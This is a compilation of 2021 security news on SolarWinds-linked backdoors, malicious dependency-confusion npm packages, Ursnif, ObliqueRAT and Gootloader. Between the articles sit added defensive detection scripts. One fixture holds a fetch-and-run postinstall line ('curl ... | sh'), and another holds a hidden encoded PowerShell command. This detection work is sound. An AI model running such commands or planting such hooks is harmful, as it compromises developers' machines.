Finally, researchers with Microsoft uncovered a new tool also written in Golang, called GoldFinder. They said that GoldFinder is likely used as a “custom HTTP tracer tool that logs the route or hops that a packet takes to reach a hardcoded C2 server.”

“When launched, GoldFinder can identify all HTTP proxy servers and other redirectors such as network security devices that an HTTP request travels through inside and outside the network to reach the intended C2 server,” said researchers. “When used on a compromised device, GoldFinder can be used to inform the actor of potential points of discovery or logging of their other actions, such as C2 communication with GoldMax.”

Other SolarWinds Malware
The uncovering of these three malware families provides another puzzle piece in better understanding the sprawling SolarWinds espionage attack. The campaign is known to have affected various federal departments, Microsoft, FireEye and dozens of others so far.

Other unique malware has been connected to the SolarWinds attack. In addition to Sunburst, which is the malware used as the tip of the spear in the campaign, researchers in January unmasked additional pieces of malware, dubbed Raindrop and Teardrop, that were used in targeted attacks after the effort’s initial mass Sunburst compromise.


Sunshuttle, the fourth malware allegedly linked to SolarWinds hack
5.3.2021 Virus  Securityaffairs

FireEye researchers spotted a new sophisticated second-stage backdoor that was likely linked to threat actors behind the SolarWinds hack.
Malware researchers at FireEye discovered a new sophisticated second-stage backdoor, dubbed Sunshuttle, while analyzing the servers of an organization that was compromised as a result of the SolarWinds supply-chain attack.

The new malware is dubbed Sunshuttle, and it was “uploaded by a U.S.-based entity to a public malware repository in August 2020.”

“Mandiant Threat Intelligence discovered a sample of the SUNSHUTTLE backdoor uploaded to an online multi-Antivirus scan service.” reads the analysis published by FireEye. “SUNSHUTTLE is a backdoor, written in GO, that reads an embedded or local configuration file, communicates with its C2 server over HTTPS and supports commands including remotely updating its configuration, file upload and download, and arbitrary command execution.”

The SUNSHUTTLE backdoor was likely developed to conduct network reconnaissance alongside other SUNBURST-related tools.

Mandiant researchers discovered the SUNSHUTTLE backdoor on a system of a victim compromised by UNC2452, and believe that it is linked to this threat actor.

Experts pointed out that the SUNSHUTTLE malware was not observed using any trick to gain persistence, which means that persistence is likely established outside the execution of this backdoor.

The SUNSHUTTLE backdoor communicates with C2 servers by passing values to them in the Cookie header.

“SUNSHUTTLE uses the cookie header to pass values to the C2.” continues FireEye. “Additionally, a referrer is selected from the following list, presumably to make the traffic blend in if traffic is being decrypted for inspection:

www.bing.com
www.yahoo.com
www.google.com
www.facebook.com
The cookie headers vary slightly depending on the operation being performed.”
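The decoy-referrer trick described here and in the GoldMax coverage above has a weak spot a defender can use: a browser only sends a Referer of www.bing.com after the user actually visited Bing, whereas a beacon fabricates one without any such visit. The Python below is an added example (not FireEye's or Microsoft's code) that runs that check over constructed proxy log lines: it flags requests whose Referer names one of the listed popular sites that the same client never visited in the preceding window, then raises an alert when one destination keeps receiving such requests with rotating referrers. The log format, client addresses and the c2-placeholder.example host are all constructed for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlparse

# Popular sites the page lists as SUNSHUTTLE/GoldMax decoy referrers.
DECOY_REFERRERS = {
    "www.bing.com", "www.yahoo.com", "www.google.com",
    "www.facebook.com", "www.twitter.com",
}

# Constructed proxy log (not real traffic). Fields:
#   timestamp client dst_host method path referer   ("-" = no Referer header)
# 10.0.0.7 is a benign user clicking a Bing result; 10.0.0.5 beacons to a
# placeholder C2 host with a different fabricated referrer on every request.
SAMPLE_LOG = """\
2021-03-05T10:00:01Z 10.0.0.7 www.bing.com GET /search?q=widgets -
2021-03-05T10:00:09Z 10.0.0.7 shop.example.net GET /widgets https://www.bing.com/
2021-03-05T10:05:00Z 10.0.0.5 c2-placeholder.example GET /api/status https://www.bing.com/
2021-03-05T10:06:00Z 10.0.0.5 c2-placeholder.example GET /api/status https://www.yahoo.com/
2021-03-05T10:07:00Z 10.0.0.5 c2-placeholder.example GET /api/status https://www.google.com/
2021-03-05T10:08:00Z 10.0.0.5 c2-placeholder.example GET /api/status https://www.facebook.com/
"""


def parse_log(text: str):
    """Turn the whitespace-separated constructed log into event dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, host, method, path, referer = line.split()
        events.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "client": client, "host": host, "method": method, "path": path,
            "referer": None if referer == "-" else referer,
        })
    return events


def find_orphan_decoy_referrers(events, window=timedelta(minutes=30)):
    """Return requests carrying a popular-site Referer that the same client
    did not actually visit within `window` before the request."""
    events = sorted(events, key=lambda e: e["ts"])
    last_visit = defaultdict(dict)  # client -> {host: last request time}
    orphans = []
    for ev in events:
        ref_host = urlparse(ev["referer"]).hostname if ev["referer"] else None
        if ref_host in DECOY_REFERRERS and ref_host != ev["host"]:
            seen = last_visit[ev["client"]].get(ref_host)
            if seen is None or ev["ts"] - seen > window:
                orphans.append(ev)
        last_visit[ev["client"]][ev["host"]] = ev["ts"]
    return orphans


def alert_on_rotating_referrers(events, min_requests=3, min_distinct=2):
    """Alert when one (client, destination) pair accumulates repeated orphan
    referrers drawn from several different popular sites."""
    buckets = defaultdict(list)
    for ev in find_orphan_decoy_referrers(events):
        buckets[(ev["client"], ev["host"])].append(urlparse(ev["referer"]).hostname)
    alerts = []
    for (client, host), refs in sorted(buckets.items()):
        if len(refs) >= min_requests and len(set(refs)) >= min_distinct:
            alerts.append({"client": client, "host": host,
                           "requests": len(refs), "referrers": sorted(set(refs))})
    return alerts


if __name__ == "__main__":
    for alert in alert_on_rotating_referrers(parse_log(SAMPLE_LOG)):
        print(alert)
```

The aggregation step is what keeps this usable: a single orphan referrer is common (privacy settings, cached pages, links opened from mail clients), but one destination collecting several different unvisited search-engine referrers from the same client in a short span is the signature of a fabricated list rather than of browsing.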

Technical details and indicators of compromise (IoCs) for this backdoor are included in the report published by FireEye.


Malicious Code Bombs Target Amazon, Lyft, Slack, Zillow
4.3.2021
Virus  Threatpost

Attackers have weaponized code dependency confusion to target internal apps at tech giants.

Researchers have spotted malicious packages targeting internal applications for Amazon, Lyft, Slack and Zillow (among others) inside the npm public code repository — all of which exfiltrate sensitive information.

The packages weaponize a proof-of-concept (PoC) code dependency-confusion exploit that was recently devised by security researcher Alex Birsan to inject rogue code into developer projects.

Internal developer projects typically use standard, trusted code dependencies that are housed in private repositories. Birsan decided to see what would happen if he created “copycat” packages to be housed instead in public repositories like npm, with the same names as the private legitimate code dependencies.

“Is it possible that some of PayPal’s internal projects will start defaulting to the new public packages instead of the private ones?” he asked. And the answer was yes.

Dependency Confusion Gains Swarms of Copycat Fans
In Birsan’s case, he tested this “dependency confusion” using benign PoC code blocks. These were uploaded to public repositories – and he simply sat back and waited to see if they would be imported. His hunch proved correct, demonstrating how outside code can be imported and propagated through a targeted company’s internal applications and systems, with relative ease — including at Apple, Microsoft, Netflix, PayPal, Shopify, Tesla and Uber.

In all, he received more than $130,000 in bug bounties and pre-approved financial arrangements from the targeted organizations, all of which had agreed to be tested. This has spawned legions of copycat bounty hunters looking to reap a payday – there were 275+ such packages uploaded to the npm repository within 48 hours of Birsan’s research being published, according to a Sonatype analysis. The number has now jumped to more than 700, Sonatype said on Tuesday, with malicious actors wading into the mix.

“An ethical researcher will typically post a package under the same name as the private dependency to a public repository like npm,” Sonatype researcher Ax Sharma explained to Threatpost in an interview. “Except, their package would contain enough minimal PoC code to demonstrate the attack to the vendor and the bug-bounty program. The ethical research packages seen by Sonatype also had disclaimers in place indicating these were a part of ethical security research, which gives some reassurance.”

Dependency Confusion Becomes Malicious
Unfortunately, Sonatype also identified several malicious packages, showing that the technique is being weaponized.

“Some of the dependency-confusion copycat packages take what may be deemed ‘ethical research’ a step further, by engaging in outright malicious activities,” Sharma explained.

Several of the copycat packages Sonatype identified exfiltrate, for example, the user’s .bash_history files and /etc/shadow files.

The .bash_history file contains a list of commands previously executed at the terminal by a user of a Unix-based OS. Unless periodically cleared, this file can contain usernames, passwords and other sensitive data.

The /etc/shadow file meanwhile maintains hashed password data of user accounts on a system. Although the file is typically restricted to “super user” accounts, a malicious actor could obtain the file should the infected machine be running npm with elevated privileges.

“These typically contain highly sensitive information that should remain unseen,” Sharma explained. “Some of these packages also established a reverse shell to their author’s servers, and had no obvious disclaimers or indications in place to clarify if this was part of ethical research, or a bug-bounty program.”

Easy, Automatic Compromise
Exacerbating the danger from these packages is the fact that these types of code imports are done automatically – when a new version becomes available, a developer project will automatically fetch it from a repository.

“What makes this trend even more problematic is that dependency confusion — because of its very nature — needs no action on the victim’s part,” Sharma explained. “Considering these malicious packages could share names with internal dependencies being used by leading organizations, they can be pulled almost instantaneously into the organizations’ builds.”

Unfortunately, it’s also fairly easy to identify what those internal dependencies are, even if they’re technically private.

“What ethical researchers typically do is monitor an organization’s public GitHub repository or CDN for code,” Sharma said. “This code may reveal the names of their internal dependencies (e.g. in the manifest files), not otherwise available on public repositories like npm, RubyGems or GitHub. At least, that is how Alex Birsan did it, but there remains room to be creative.”

And further, because the copycat packages are uploaded to public repositories, there’s little barrier to entry for malicious attackers. This is the same problem that’s often found in software supply-chain attacks involving typosquatting and brandjacking of public packages.

“Anybody — whether ethical researchers or malicious actors — can exploit the dependency confusion issue,” Sharma said. “What constitutes ‘ethical’ or not is largely determined by the actor’s intent.”

Amazon, Lyft, Slack and Zillow Copycat Packages
Researchers uncovered malicious packages targeting a variety of companies, but four aimed at Amazon, Lyft, Slack and Zillow stood out.

The npm webpage for “amzn” offers two identical versions of a malicious package, each of which contains just two files: a manifest called package.json, and the functional run.js file. The “amzn” package has a name analogous to Amazon’s GitHub repository and open-source packages, according to researchers.

“Inside run.js is where we see the contents of the /etc/shadow file being accessed and ultimately exfiltrated to the package’s author at the domain comevil[.]fun,” according to the analysis. “The code also has the author opening a reverse shell to their server which would spawn as soon as the `amzn` package infiltrates the vulnerable build.”

As for Zillow, the package “zg-rentals” was also posted to npm by the same author, and is identical in structure and functionality to the “amzn” package, researchers said. Neither offers any indication or disclaimer that they could be linked to an ethical research effort, according to the Sonatype analysis.

Meanwhile, the malicious “serverless-slack-app” package also has no clear-cut sign that it’s linked to ethical research or a bug-bounty program. It’s named after a legitimate package made by an Atlassian developer. It has both preinstall and postinstall scripts launched by the manifest file, according to Sonatype.

“While the index.js script spun up at the preinstall stage is an identical replica of that in Birsan’s PoC research packages, the postinstall script is particularly interesting,” according to the post. “At the postinstall stage, another script hosted on GitHub is run that sends the user’s .bash_history file to the author behind serverless-slack-app.”
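The two exposures this article describes (an internal package name that a public registry can satisfy, and install-time hooks that run code automatically) can be checked statically before `npm install` runs. The script below is an added example, not code from Sonatype, Birsan or any of the packages named above; the package names, scope, registry URL and script commands in it are constructed for the demonstration.

```python
"""Static audit for dependency-confusion exposure in an npm project.

Added example; not code from Sonatype, Alex Birsan or the packages the
article names. Every package name, scope, registry URL and script below is
constructed for the demonstration.
"""
import re
from typing import Dict, List, Set, Tuple

# An exact semver pin; anything else is a range that lets npm pick a newer
# (possibly public, higher-versioned) copy as soon as one appears.
_EXACT_VERSION = re.compile(r"^\d+\.\d+\.\d+(-[0-9A-Za-z.-]+)?$")
# Commands in lifecycle scripts that reach out to the network at install time.
_REMOTE_FETCH = re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b|https?://", re.I)
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")


def parse_npmrc(text: str) -> Dict[str, str]:
    """Return {scope: registry} for '@scope:registry=URL' lines in an .npmrc."""
    scopes: Dict[str, str] = {}
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("@") and ":registry=" in line:
            scope, url = line.split(":registry=", 1)
            scopes[scope] = url.strip()
    return scopes


def audit_manifest(manifest: dict, internal_names: Set[str],
                   npmrc_text: str) -> List[Tuple[str, str]]:
    """Flag dependencies that a same-named public package could satisfy.

    Returns (package_name, finding_code) pairs. Codes:
      UNSCOPED_INTERNAL  internal name with no scope: resolved from the default
                         registry, so a public package of that name can win
      SCOPE_NOT_PINNED   scoped internal name whose scope is not mapped to a
                         private registry in .npmrc
      FLOATING_RANGE     version range on an internal name, so a higher public
                         version is preferred automatically
    """
    pinned_scopes = parse_npmrc(npmrc_text)
    findings: List[Tuple[str, str]] = []
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        for name, spec in manifest.get(section, {}).items():
            if name not in internal_names:
                continue  # genuinely public packages are outside this check
            scope = name.split("/", 1)[0] if name.startswith("@") else None
            if scope is None:
                findings.append((name, "UNSCOPED_INTERNAL"))
            elif scope not in pinned_scopes:
                findings.append((name, "SCOPE_NOT_PINNED"))
            if not _EXACT_VERSION.match(spec.strip()):
                findings.append((name, "FLOATING_RANGE"))
    return findings


def audit_lifecycle_scripts(package_manifest: dict) -> List[Tuple[str, str, bool]]:
    """List install-time hooks in a fetched package's manifest.

    Each entry is (hook, command, fetches_remote_code). Hooks run automatically
    during 'npm install', which is how the copycat packages described in the
    article executed their code without any action by the developer.
    """
    scripts = package_manifest.get("scripts", {})
    return [
        (hook, scripts[hook], bool(_REMOTE_FETCH.search(scripts[hook])))
        for hook in LIFECYCLE_HOOKS
        if hook in scripts
    ]


# Constructed sample project: a manifest, its .npmrc and the names the
# organisation publishes only to its private registry.
INTERNAL_PACKAGES = {"acme-billing-core", "@acme/internal-ui", "acme-auth",
                     "acme-lint-rules", "@partner/sdk"}
SAMPLE_MANIFEST = {
    "name": "acme-portal",
    "dependencies": {
        "acme-billing-core": "^2.1.0",   # unscoped and a range: worst case
        "@acme/internal-ui": "1.4.2",    # scoped, scope pinned, exact version
        "express": "^4.17.1",            # genuinely public
        "acme-auth": "*",
        "@partner/sdk": "^1.0.0",        # scope has no .npmrc mapping
    },
    "devDependencies": {"acme-lint-rules": "3.0.0"},
}
SAMPLE_NPMRC = ("@acme:registry=https://npm.internal.example/\n"
                "registry=https://registry.npmjs.org/\n")
# Constructed stand-in for a copycat package whose postinstall pulls a remote script.
SAMPLE_FETCHED_MANIFEST = {
    "name": "acme-auth", "version": "99.9.9",
    "scripts": {"preinstall": "node index.js",
                "postinstall": "curl -s https://example.invalid/post.sh | sh"},
}

if __name__ == "__main__":
    for name, code in audit_manifest(SAMPLE_MANIFEST, INTERNAL_PACKAGES, SAMPLE_NPMRC):
        print(f"{code:<18} {name}")
    for hook, cmd, remote in audit_lifecycle_scripts(SAMPLE_FETCHED_MANIFEST):
        print(f"{hook:<11} remote={remote} {cmd}")
```

The check is static: it does not query any registry, so it can run in CI on the manifest and .npmrc alone.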

The same author published a near-identical Lyft package, called lyft-dataset-sdk, which shares a name with a Python-based package used by Lyft.

“I was starting to wonder when we were going to see a malicious actor take advantage of the current situation,” Sonatype security researcher Juan Aguirre said, in the posting. “Finally, we’ve spotted one.”

He added, “It’s interesting to look at all the malicious npm copycat packages released recently. You can see their evolution. They start out with pretty much the same code base as the PoC released by researcher Alex Birsan and they gradually start getting creative.”


The Ursnif Trojan has hit over 100 Italian banks
4.3.2021
Virus  Securityaffairs

Avast researchers reported that the infamous Ursnif Trojan was employed in attacks against at least 100 banks in Italy.
Avast experts recently obtained information on possible victims of Ursnif malware that confirms the interest of malware operators in targeting Italian banks.

Operators behind these attacks have stolen financial data and credentials from the targeted financial institutions.

“Among the countries Ursnif has significantly impacted is Italy, a fact that we found reflected in the information our researchers obtained.” reads the analysis published by Avast. “Specifically we found usernames, passwords, credit card, banking and payment information that appears to have been stolen from Ursnif victims by the malware operators. We saw evidence of over 100 Italian banks targeted in the information we obtained. We also saw over 1,700 stolen credentials for a single payment processor.”
According to data obtained by Avast, at least 100 Italian banks have been targeted with the Ursnif Trojan, and in one case crooks stole over 1,700 sets of credentials from an unnamed payment processor.

Ursnif is one of the most widespread and common threats today, delivered through malspam campaigns. It appeared on the threat landscape about 13 years ago and has gained popularity since 2014, when its source code was leaked online, giving several threat actors the opportunity to develop their own versions.
Avast researchers shared their findings with the impacted payment processors and banks, as well as with Italian authorities and financial CERTs, including CERTFin.

“With this information these companies and institutions are taking steps to protect their customers and help them recover from the impact of Ursnif,” concludes Avast.


Hackers Now Hiding ObliqueRAT Payload in Images to Evade Detection
4.3.2021
Virus  Thehackernews

Cybercriminals are now deploying remote access Trojans (RATs) under the guise of seemingly innocuous images hosted on infected websites, once again highlighting how threat actors quickly change tactics when their attack methods are discovered and exposed publicly.

New research released by Cisco Talos reveals a new malware campaign targeting organizations in South Asia that uses malicious Microsoft Office documents weaponized with macros to spread a RAT that goes by the name of ObliqueRAT.

First documented in February 2020, the malware has been linked to a threat actor tracked as Transparent Tribe (aka Operation C-Major, Mythic Leopard, or APT36), a highly prolific group allegedly of Pakistani origin known for its attacks against human rights activists in the country as well as military and government personnel in India.

While the ObliqueRAT modus operandi previously overlapped with another Transparent Tribe campaign in December 2019 to disseminate CrimsonRAT, the new wave of attacks differs in two crucial ways.

In addition to making use of a completely different macro code to download and deploy the RAT payload, the operators of the campaign have also updated the delivery mechanism by cloaking the malware in seemingly benign bitmap image files (.BMP files) on a network of adversary-controlled websites.

"Another instance of a maldoc uses a similar technique with the difference being that the payload hosted on the compromised website is a BMP image containing a ZIP file that contains ObliqueRAT payload," Talos researcher Asheer Malhotra said. "The malicious macros are responsible for extracting the ZIP and subsequently the ObliqueRAT payload on the endpoint."

Regardless of the infection chain, the goal is to trick victims into opening emails containing the weaponized documents, which, once opened, direct victims to the ObliqueRAT payload (version 6.3.5 as of November 2020) via malicious URLs and ultimately export sensitive data from the target system.

But it's not just the distribution chain that has received an upgrade. At least four different versions of ObliqueRAT have been discovered since it was first documented, which Talos suspects are changes likely made in response to previous public disclosures, while also expanding its information-stealing capabilities to include screenshot and webcam recording features and the execution of arbitrary commands.

The use of steganography to deliver malicious payloads is not new, nor is the abuse of hacked websites to host malware.

In June 2020, Magecart groups were found to hide web skimmer code in the EXIF metadata of a website's favicon image. Earlier this week, researchers from Sophos uncovered a Gootkit campaign that leverages Search Engine Optimization (SEO) poisoning in hopes of infecting users with malware by directing them to fake pages on legitimate but compromised websites.

But this technique of using poisoned documents to point users to malware hidden in image files marks a shift in infection capabilities, with the aim of slipping through without attracting too much scrutiny and staying under the radar.

"This new campaign is a typical example of how adversaries react to attack disclosures and evolve their infection chains to evade detections," the researchers said. "Modifications in the ObliqueRAT payloads also highlight the usage of obfuscation techniques that can be used to evade traditional signature-based detection mechanisms."


Malware Loader Abuses Google SEO to Expand Payload Delivery

2.3.2021  Virus  Threatpost

Gootloader has expanded its payloads beyond the Gootkit malware family, using Google SEO poisoning to gain traction.

The Gootloader malware loader, previously used for distributing the Gootkit malware family, has undergone what researchers call a “renaissance” when it comes to payload delivery.

New research released this week paints Gootloader as an increasingly sophisticated loader framework, which has now expanded the number of payloads it delivers beyond Gootkit (and in some cases, the previously-distributed REvil ransomware), to include the Kronos trojan and the Cobalt Strike commodity malware.

Gootloader is known for its multi-stage attack process, obfuscation tactics, and for using a known tactic for malware delivery called search engine optimization (SEO) poisoning. This technique leverages SEO-friendly terms in attacker-controlled websites, in order to rank them higher in Google’s search index. In the end, the method brings more eyeballs to the malicious sites, which contain links that launch the Gootloader attack chain.

“The malware delivery method pioneered by the threat actors behind the REvil ransomware and the Gootkit banking Trojan has been enjoying a renaissance of late, as telemetry indicates that criminals are using the method to deploy an array of malware payloads in South Korea, Germany, France, and across North America,” said Gabor Szappanos and Andrew Brandt, security researchers with Sophos Labs on Monday.

What is the Gootloader Malware Tool?
Gootloader is a Javascript-based infection framework that was traditionally used for the Gootkit remote access trojan (RAT). The Gootkit malware family, which has been around for more than five years, has evolved over time into a mature trojan primarily aimed at stealing banking credentials.

While Gootloader was previously used as a vehicle to merely deliver the Gootkit malware, “In recent years, almost as much effort has gone into improvement of its delivery method as has gone into the NodeJS-based malware itself,” said researchers.

In addition to its use of SEO poisoning, what sets Gootloader apart is its fileless malware delivery tactics, they said. Fileless malware uses trusted, legitimate processes (in the case of Gootloader, PowerShell, for instance), which allows the malware delivery mechanism to evade antivirus products.

Gootloader Malware: Compromised, Legitimate Websites
In order to perform SEO poisoning, Gootloader attackers have first compromised a wide variety of legitimate websites, which they maintain on a network of roughly 400 servers, said researchers.

Figure: An example of a Gootloader attack. Credit: Sophos Labs

Researchers said the operators of these legitimate, hacked websites do not seem to know their websites are being abused in this manner.

“It isn’t clear how the threat actors gain access to the backend of these sites, but historically, these kinds of website compromises may be the result of any of a number of methods: The attackers may simply obtain the sites’ passwords from the Gootkit malware itself, or from any of a number of criminal markets that trade in stolen credentials, or by leveraging any of a number of security exploits in the plugins or add-ons of the CMS software,” they said.

Using Google Search Engine Optimization For Malware Delivery
Gootloader attackers then tweak the content management systems of the compromised websites to use key SEO tactics and terms. The goal here is to appear at the top of Google’s index when certain questions are typed into Google search.

For instance, typing the question “do I need a party wall agreement to sell my house?” turns up a legitimate website for a Canada-based neonatal medical practice, which has actually been compromised by Gootloader attackers.

The part of the website that has been compromised by attackers features a “message board” with a “user” asking the question “do I need a party wall agreement to sell my house?” This uses the exact same wording as the search query, as a way to rank higher on Google’s search index – even if it has nothing to do with the actual content of the compromised website.

Figure: An example of a Gootloader attack. Credit: Sophos Labs

On that “message board,” an “admin profile” then responds to the question with a link purporting to have more information.

“None of the site’s legitimate content has anything to do with real estate transactions – its doctors deliver babies – and yet it is the first result to appear in a query about a very narrowly defined type of real estate agreement,” said researchers. “Google itself indicates the result is not an ad, and they have known about the site for nearly seven years. To the end user, the entire thing looks on the up-and-up.”

Threatpost has reached out to Google for more information on how the company is battling such SEO poisoning types of attacks.

Gootloader Payload Delivery Mechanism
Gootloader’s payload delivery mechanism is complex and involves multiple stages.

Initially, when the website user clicks on the “admin” account’s link on the compromised website, they receive a ZIP archive file with a filename (again matching the search query terms used in the initial search). This file then contains a JS file with the same name. A .js file is a text file containing JavaScript code, normally used to execute JavaScript instructions in webpages; the JS files in this attack typically invoke the Windows Scripting Host (wscript.exe) when run.

“This .js file is the initial infector, and the only stage of the infection at which a file is written to the filesystem,” said researchers. “Everything that happens after the target double-clicks this script runs entirely in memory, out of the reach of traditional endpoint protection tools.”

The first-stage script, which is obfuscated, attempts to contact the command-and-control (C2) server – if it successfully does so, the second-stage malware process then creates an auto-run entry for a PowerShell script that doesn’t execute until the system reboots, creating a stealthy way for attackers to sidestep detection.

“Because this next stage doesn’t completely execute until the next time the computer reboots, the target may not actually discover the infection until some hours or even days later – whenever they fully reboot Windows,” said researchers.

Once the computer reboots, the PowerShell script runs and begins a domino-like sequence of events, ending with Gootloader attempting to download its final payload.

“The Delphi loader contains the final payload – Kronos, REvil, Gootkit, or Cobalt Strike – in encrypted form,” said researchers. “In those cases, the loader decrypts the payload, then uses its own PE loader to execute the payload in memory.”
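The observable parts of this chain (a .js dropped from a ZIP into a user folder and launched by wscript.exe, an autorun entry for PowerShell that fires at the next logon, and the PowerShell process itself) can be correlated per host in endpoint telemetry. The script below is an added example, not Sophos' code, and also serves the two following Gootloader articles; the event format, hostnames, paths, filenames and the <BASE64_PLACEHOLDER> token are assumptions constructed for the demonstration.

```python
"""Per-host correlation of Gootloader-like stages in endpoint telemetry.

Added example, not Sophos' detection logic. Events are simplified process
creation / registry-set records; every host, path, command and filename
below is constructed.
"""
import re
from collections import defaultdict
from typing import Dict, List

# Folders a browser or archive tool writes to; a .js launched from one of
# these by the Windows Script Host is the only on-disk Gootloader stage.
_USER_WRITABLE = re.compile(
    r"\\Users\\[^\\]+\\(Downloads|AppData\\Local\\Temp|Desktop)\\", re.I)
_SCRIPT_HOST = re.compile(r"\\(wscript|cscript)\.exe$", re.I)
# First drive-letter path ending in .js on the command line (quoted or not).
_JS_ARG = re.compile(r"([A-Za-z]:\\[^\"]*?\.js)\b", re.I)
_RUN_KEY = re.compile(
    r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
_POWERSHELL = re.compile(r"powershell(\.exe)?", re.I)
# Switches that hide the window, skip the profile or pass an encoded script.
_PS_STEALTH = re.compile(
    r"-(enc|encodedcommand|nop|noprofile|w(indowstyle)?\s+hidden)\b", re.I)


def classify(ev: dict) -> str:
    """Map one telemetry event to a chain stage, or '' if it matches none."""
    if ev["type"] == "process":
        image, cmd = ev["image"], ev["cmdline"]
        if _SCRIPT_HOST.search(image):
            m = _JS_ARG.search(cmd)
            if m and _USER_WRITABLE.search(m.group(1)):
                return "stage1_js_from_user_dir"
        # A Run-key entry is started by explorer.exe at logon after the reboot.
        if (_POWERSHELL.search(image) and _PS_STEALTH.search(cmd)
                and ev.get("parent", "").lower().endswith("explorer.exe")):
            return "stage3_powershell_at_logon"
    elif ev["type"] == "registry":
        if _RUN_KEY.search(ev["key"]) and _POWERSHELL.search(ev["value"]):
            return "stage2_powershell_autorun"
    return ""


def detect_gootloader_chain(events: List[dict]) -> Dict[str, dict]:
    """Group stage hits by host; 'chain' is True once stage 1 and 2 both appear."""
    per_host: Dict[str, List[str]] = defaultdict(list)
    for ev in events:
        stage = classify(ev)
        if stage:
            per_host[ev["host"]].append(stage)
    result: Dict[str, dict] = {}
    for host, stages in per_host.items():
        seen = {s.split("_", 1)[0] for s in stages}
        result[host] = {"stages": stages, "chain": {"stage1", "stage2"} <= seen}
    return result


# Constructed telemetry: WS01 shows the full chain, WS02 runs a legitimate
# logon script from a file share, WS03 has only a PowerShell autorun.
SAMPLE_EVENTS = [
    {"host": "WS01", "type": "process",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\wscript.exe" '
                r'"C:\Users\alice\Downloads\party wall agreement to sell my house 58471.js"',
     "parent": r"C:\Windows\explorer.exe"},
    {"host": "WS01", "type": "registry",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "value": "powershell.exe -w hidden -nop -enc <BASE64_PLACEHOLDER>"},
    {"host": "WS01", "type": "process",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -nop -enc <BASE64_PLACEHOLDER>",
     "parent": r"C:\Windows\explorer.exe"},
    {"host": "WS02", "type": "process",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe \\fileserver\netlogon\logon.js",
     "parent": r"C:\Windows\System32\userinit.exe"},
    {"host": "WS03", "type": "registry",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Sync",
     "value": "powershell.exe -nop -w hidden -File C:\\Users\\bob\\sync.ps1"},
]

if __name__ == "__main__":
    for host, info in detect_gootloader_chain(SAMPLE_EVENTS).items():
        print(host, "CHAIN" if info["chain"] else "partial", info["stages"])
```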

Other Malware Google SEO Abuse Tactics
The abuse of SEO to gain more eyeballs and traction to malicious sites is an age-old trick for cybercriminals, with examples of this type of tactic dating back to at least 2011. In 2017, cybercriminals poisoned Google search results in the hope of infecting users with a banking Trojan called Zeus Panda, for instance.

These types of attacks continue because they work, said researchers.

“Script blockers like NoScript for Firefox could help a cautious web surfer remain safe by preventing the initial replacement of the hacked web page to happen, but not everyone uses those tools (or finds them convenient or even intuitive),” they said. “Even attentive users who are aware of the trick involving the fake forum page might not recognize it until it’s too late.”


Gootkit delivery platform Gootloader used to deliver additional payloads
2.3.2021 
Virus  Securityaffairs

The Javascript-based infection framework for the Gootkit RAT was enhanced to deliver a wider variety of malware, including ransomware.
Experts from Sophos documented the evolution of the “Gootloader,” the framework used for delivering the Gootkit RAT banking Trojan. The framework was improved to deploy a wider range of malware, including ransomware payloads.

“In recent years, almost as much effort has gone into improvement of its delivery method as has gone into the NodeJS-based malware itself.” reads the analysis published by researchers Gabor Szappanos and Andrew Brandt from Sophos.

“In addition to the REvil and Gootkit payloads, Gootloader has been used most recently to deliver the Kronos trojan and Cobalt Strike. In its latest attempts to evade detection by endpoint security tools, Gootloader has moved as much of its infection infrastructure to a “fileless” methodology as possible.”

The Gootkit delivery platform was used by multiple threat actors to deliver ransomware and other malware, including the REvil ransomware, the Kronos trojan, and Cobalt Strike.

Recently, in an attempt to evade detection, Gootloader has started using a “fileless” methodology.

Telemetry reveals that crooks are using this technique to spread multiple payloads in South Korea, Germany, France, and across North America.

The framework uses black-hat search engine optimization (SEO) techniques to poison Google search results and spread links pointing to the malware.

When the visitor clicks on the link provided by the search engine, they are redirected to landing pages that answer their exact questions, using the same wording as the search query.

“And if that same site visitor clicks the “direct download link” provided on this page, they receive a .zip archive file with a filename that exactly matches the search query terms used in the initial search, which itself contains another file named in precisely the same way.” continues the analysis. “This .js file is the initial infector, and the only stage of the infection at which a malicious file is written to the filesystem. Everything that happens after the target double-clicks this script runs entirely in memory, out of the reach of traditional endpoint protection tools.”

Many of the hacked sites employed in the attacks observed by Sophos were serving the fake message board and were running a well-known CMS. It isn’t clear how the attackers gain access to the backend of these sites, but experts speculate the compromises may be the result of attacks using site passwords obtained through the Gootkit malware or from past data breaches, or of the exploitation of security flaws in the CMS plugins or add-ons.

The Gootloader infection process is multi-stage: it begins with a .NET loader, which contains a Delphi-based loader, which in turn contains the final payload in encrypted form.

“The developers behind Gootkit appear to have shifted resources and energy from delivering just their own financial malware to creating a stealthy, complex delivery platform for all kinds of payloads, including REvil ransomware,” conclude the experts. “This shows that criminals tend to reuse their proven solutions instead of developing new delivery mechanisms. Further, instead of actively attacking endpoint tools as some malware distributors do, the creators of Gootloader have opted for convoluted evasive techniques that conceal the end result.”


Gootkit RAT Using SEO to Distribute Malware Through Compromised Sites
2.3.2021 
Virus  Thehackernews

A framework notorious for delivering a banking Trojan has received a facelift to deploy a wider range of malware, including ransomware payloads.

"The Gootkit malware family has been around more than half a decade – a mature Trojan with functionality centered around banking credential theft," Sophos researchers Gabor Szappanos and Andrew Brandt said in a write-up published today.

"In recent years, almost as much effort has gone into improvement of its delivery method as has gone into the NodeJS-based malware itself."

Dubbed "Gootloader," the expanded malware delivery system comes amid a surge in the number of infections targeting users in France, Germany, South Korea, and the U.S.

First documented in 2014, Gootkit is a Javascript-based malware platform capable of carrying out an array of covert activities, including web injection, capturing keystrokes, taking screenshots, recording videos, as well as email and password theft.

